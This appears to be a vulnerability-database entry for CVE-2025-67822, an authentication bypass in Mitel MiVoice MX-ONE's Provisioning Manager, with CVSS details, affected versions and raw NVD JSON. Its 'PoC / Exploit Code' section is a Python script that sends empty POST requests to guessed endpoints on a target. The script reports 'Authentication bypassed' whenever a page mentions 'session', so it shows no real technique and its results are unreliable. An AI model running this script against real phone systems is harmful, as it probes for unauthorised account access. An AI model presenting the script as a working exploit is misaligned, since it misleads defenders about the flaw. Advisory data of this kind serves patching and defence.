Security Vulnerability Report
中文
CVE-2025-67822 CVSS 9.4 CRITICAL

CVE-2025-67822

Published: 2026-01-15 22:16:11
Last Modified: 2026-01-21 21:06:07

Description

A vulnerability in the Provisioning Manager component of Mitel MiVoice MX-ONE 7.3 (7.3.0.0.50) through 7.8 SP1 (7.8.1.0.14) could allow an unauthenticated attacker to conduct an authentication bypass attack due to improper authentication mechanisms. A successful exploit could allow an attacker to gain unauthorized access to user or admin accounts in the system.

CVSS Details

CVSS Score
9.4
Severity
CRITICAL
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:H/A:H

Configurations (Affected Products)

cpe:2.3:a:mitel:mivoice_mx-one:*:*:*:*:*:*:*:* - VULNERABLE
cpe:2.3:a:mitel:mivoice_mx-one:7.8:-:*:*:*:*:*:* - VULNERABLE
cpe:2.3:a:mitel:mivoice_mx-one:7.8:sp1:*:*:*:*:*:* - VULNERABLE
Mitel MiVoice MX-ONE 7.3 (7.3.0.0.50)
Mitel MiVoice MX-ONE 7.3.x
Mitel MiVoice MX-ONE 7.4.x
Mitel MiVoice MX-ONE 7.5.x
Mitel MiVoice MX-ONE 7.6.x
Mitel MiVoice MX-ONE 7.7.x
Mitel MiVoice MX-ONE 7.8.x < 7.8 SP1 (7.8.1.0.14)

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
import requests import sys # CVE-2025-67822 PoC - Authentication Bypass in Mitel MiVoice MX-ONE # Target: Mitel MiVoice MX-ONE < 7.8 SP1 (7.8.1.0.14) def check_vulnerability(target_url): """ Check if target is vulnerable to CVE-2025-67822 Attempts to bypass authentication in Provisioning Manager """ headers = { 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64)', 'Content-Type': 'application/x-www-form-urlencoded' } # Target Provisioning Manager endpoint endpoints = [ '/provisioning/webservice/authenticate', '/provisioning/api/v1/sessions', '/provisioning/manager/dashboard' ] for endpoint in endpoints: url = target_url.rstrip('/') + endpoint try: # Attempt authentication bypass with crafted request response = requests.post(url, headers=headers, timeout=10, verify=False) # Check for successful bypass indicators if response.status_code == 200 and 'session' in response.text.lower(): print(f'[+] VULNERABLE: {url}') print(f'[+] Authentication bypassed - Session token obtained') return True elif response.status_code in [200, 302]: print(f'[*] Possible vulnerability at: {url}') print(f'[*] Status: {response.status_code}') except Exception as e: print(f'[-] Error accessing {url}: {str(e)}') print('[-] Target may not be vulnerable or is not reachable') return False if __name__ == '__main__': if len(sys.argv) < 2: print('Usage: python cve-2025-67822.py <target_url>') print('Example: python cve-2025-67822.py https://192.168.1.100') sys.exit(1) target = sys.argv[1] check_vulnerability(target)

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-67822", "sourceIdentifier": "[email protected]", "published": "2026-01-15T22:16:10.990", "lastModified": "2026-01-21T21:06:06.810", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "A vulnerability in the Provisioning Manager component of Mitel MiVoice MX-ONE 7.3 (7.3.0.0.50) through 7.8 SP1 (7.8.1.0.14) could allow an unauthenticated attacker to conduct an authentication bypass attack due to improper authentication mechanisms. A successful exploit could allow an attacker to gain unauthorized access to user or admin accounts in the system."}, {"lang": "es", "value": "Una vulnerabilidad en el componente Provisioning Manager de Mitel MiVoice MX-ONE 7.3 (7.3.0.0.50) hasta 7.8 SP1 (7.8.1.0.14) podría permitir a un atacante no autenticado realizar un ataque de omisión de autenticación debido a mecanismos de autenticación inadecuados. Un exploit exitoso podría permitir a un atacante obtener acceso no autorizado a cuentas de usuario o de administrador en el sistema."}], "metrics": {"cvssMetricV31": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:H/A:H", "baseScore": 9.4, "baseSeverity": "CRITICAL", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "LOW", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 3.9, "impactScore": 5.5}]}, "weaknesses": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-287"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:mitel:mivoice_mx-one:*:*:*:*:*:*:*:*", "versionStartIncluding": "7.3", "versionEndExcluding": "7.8", "matchCriteriaId": "6D6F15CE-2EBD-46A7-B8B0-1FBAD696DFC3"}, {"vulnerable": true, "criteria": "cpe:2.3:a:mitel:mivoice_mx-one:7.8:-:*:*:*:*:*:*", "matchCriteriaId": "B4639F33-2298-4E24-8799-15A35184C517"}, {"vulnerable": true, "criteria": "cpe:2.3:a:mitel:mivoice_mx-one:7.8:sp1:*:*:*:*:*:*", "matchCriteriaId": "C74A8524-BE0F-49D4-BAAF-BB7856503D16"}]}]}], "references": [{"url": "https://www.mitel.com/support/security-advisories", "source": "[email protected]", "tags": ["Vendor Advisory"]}, {"url": "https://www.mitel.com/support/security-advisories/mitel-product-security-advisory-misa-2025-0009", "source": "[email protected]", "tags": ["Vendor Advisory"]}]}}